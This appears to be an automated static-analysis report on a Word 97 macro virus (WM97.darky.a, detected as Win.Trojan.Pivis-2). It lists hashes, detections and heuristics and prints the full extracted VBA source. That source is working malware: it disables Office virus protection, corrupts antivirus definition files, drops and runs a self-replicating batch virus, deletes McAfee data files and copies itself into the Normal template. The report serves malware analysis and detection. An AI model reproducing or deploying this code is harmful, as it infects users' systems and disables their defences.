Win.Trojan.Pivis-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 b1b55397bcbcdd56…

MALICIOUS

Office (OLE)

34.0 KB Created: 1999-12-27 16:37:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 43d3e31e06f7ab6725cca28f8bc6366c SHA-1: 48090b1b2a3591477bcac5d712f412e4bdc06eba SHA-256: b1b55397bcbcdd5639782583517c2dcd293c67f2e4632b801463a6275cb29832
348 Risk Score

Malware Insights

Win.Trojan.Pivis-2 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

This document contains a legacy WordBasic macro with AutoClose functionality, which is designed to execute automatically when the document is closed. The macro attempts to export itself as 'darky.dll' and also interacts with security software directories, suggesting an attempt to disable defenses or establish persistence. The presence of legacy macro virus markers and the ClamAV detection of 'Win.Trojan.Pivis-2' and 'Win.Trojan.Darky-1' strongly indicate malicious intent.

Heuristics 7

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    SHELL "c:\darky"
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
        .VirusProtection = False
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4142 bytes
SHA-256: d74699243462d9d9d2454003d40a502ce557875fcff6cd9404a884cca9fa705e
Detection
ClamAV: Win.Trojan.Darky-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "darky"
Sub AutoClose()
' [WM97.darky.a]
' by -KD- / Metaphase VX Team & NoMercyVirusTeam
' Tech used from Mr.Vic, 29/A & NoMercy special thanx
' Special greetz to Darkman & 29/A
On Error Resume Next
Application.VBE.ActiveVBProject.VBComponents("darky").Export "c:\darky.dll"
With Options
    .ConfirmConversions = False
    .VirusProtection = False
    .SaveNormalPrompt = False
End With
Application.ScreenUpdating = False
Application.DisplayStatusBar = False
Application.DisplayAlerts = False
Options.VirusProtection = False
CommandBars("tools").Controls("Macro").Delete
CommandBars("tools").Controls("Customize...").Delete
CommandBars("view").Controls("Toolbars").Delete
CommandBars("view").Controls("Status Bar").Delete
For X = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(I).Name = "darky" Then NormInstall = True
Next X
For X = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(I).Name = "darky" Then ActivInstall = True
Next X
If ActivInstall = True And NormInstall = False Then Set Dm = NormalTemplate.VBProject _
Else If ActivInstall = False And NormInstall = True Then Set Dm = ActiveDocument.VBProject
On Error GoTo leave_darky
If Day(Date) = "21" Then
Open "C:\f-prot\macro.def" For Output As #1
Print #1, " WM97.darky.a"
Print #1, " WM97.darky.a"
Print #1, " WM97.darky.a"
Close #1
SetAttr "C:\f-prot\macro.def", vbReadOnly
Open "C:\program files\mcafee\*.dat" For Output As #2
Print #2, " WM97.darky.a"
Print #2, " WM97.darky.a"
Print #2, " WM97.darky.a"
Close #2
SetAttr "C:\program files\mcafee\*.dat", vbReadOnly
Open "C:\f-macro\*.def" For Output As #3
Print #3, " WM97.darky.a"
Print #3, " WM97.darky.a"
Print #3, " WM97.darky.a"
Close #3
SetAttr "C:\f-macro\*.def", vbReadOnly
Open "c:\darky.bat" For Output As #4
Print #4, ":: [bat._darky.a]"
Print #4, ":: by -KD- / Metaphase VX Team & NoMercyVirusTeam"
Print #4, ":: Greetz to Darkman and 29/A"
Print #4, "::"
Print #4, "@echo off%__darky%"
Print #4, "if '%1=='_darky goto _darky%2"
Print #4, "set _darky=%0.bat"
Print #4, "if not exist %_darky% set _darky=%0"
Print #4, "if '%_darky%==' set _darky=autoexec.bat"
Print #4, "if exist c:\__darky.bat goto _darky_gettin_ya"
Print #4, "if not exist %_darky% goto exist_darky"
Print #4, "find "; CHR$(34); "_darky"; CHR$(34); "<%_darky%>c:\__darky.bat"
Print #4, "attrib c:\__darky.bat +h"
Print #4, ":_darky_gettin_ya"
Print #4, "if '%!_darky%=='-- goto _darky_pay"
Print #4, "set !_darky=%!_darky%-"
Print #4, "command /e:5000 /c c:\__darky _darky vx . .. \ %path%"
Print #4, ":exist_darky"
Print #4, "set _darky="
Print #4, "goto _darky_pay"
Print #4, ":_darkyvx"
Print #4, "shift%__darky%"
Print #4, "if '%2==' exit _darky"
Print #4, "for %%a in (%2\*.bat %2*.bat) do call c:\__darky _darky infect %%a "
Print #4, "goto _darkyvx"
Print #4, ":_darkyinfect"
Print #4, "find '_darky'<%3>nul"
Print #4, "if not errorlevel 1 goto _darky_jump"
Print #4, "type %3>_darky$"
Print #4, "echo.>>_darky$"
Print #4, "type c:\__darky.bat>>_darky$"
Print #4, "move _darky$ %3>nul"
Print #4, "set _darky#=%_darky#%-"
Print #4, "if %_darky#%==-- exit"
Print #4, ":_darky_jump"
Print #4, "set _darky!=%_darky!%-"
Print #4, "if %_darky!%==-- exit"
Print #4, ":_darky_pay"
Print #4, "echo.|date|find "; CHR$(34); "10"; CHR$(34); ">nul._darky"
Print #4, "if errorlevel 1 goto _darky_exit"
Print #4, "echo y| del c:\mcafee\*.dat"
Print #4, "if errorlevel 1 goto darkymsg"
Print #4, ":darkymsg"
Print #4, "echo bat._darky.a by -kd-"
Print #4, ":_darky_exit"
Close #4
SHELL "c:\darky"
Kill "c:\darky.bat"
Else
End If
leave_darky:
On Error Resume Next
Dm.VBComponents.Import ("c:\darky.dll")
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.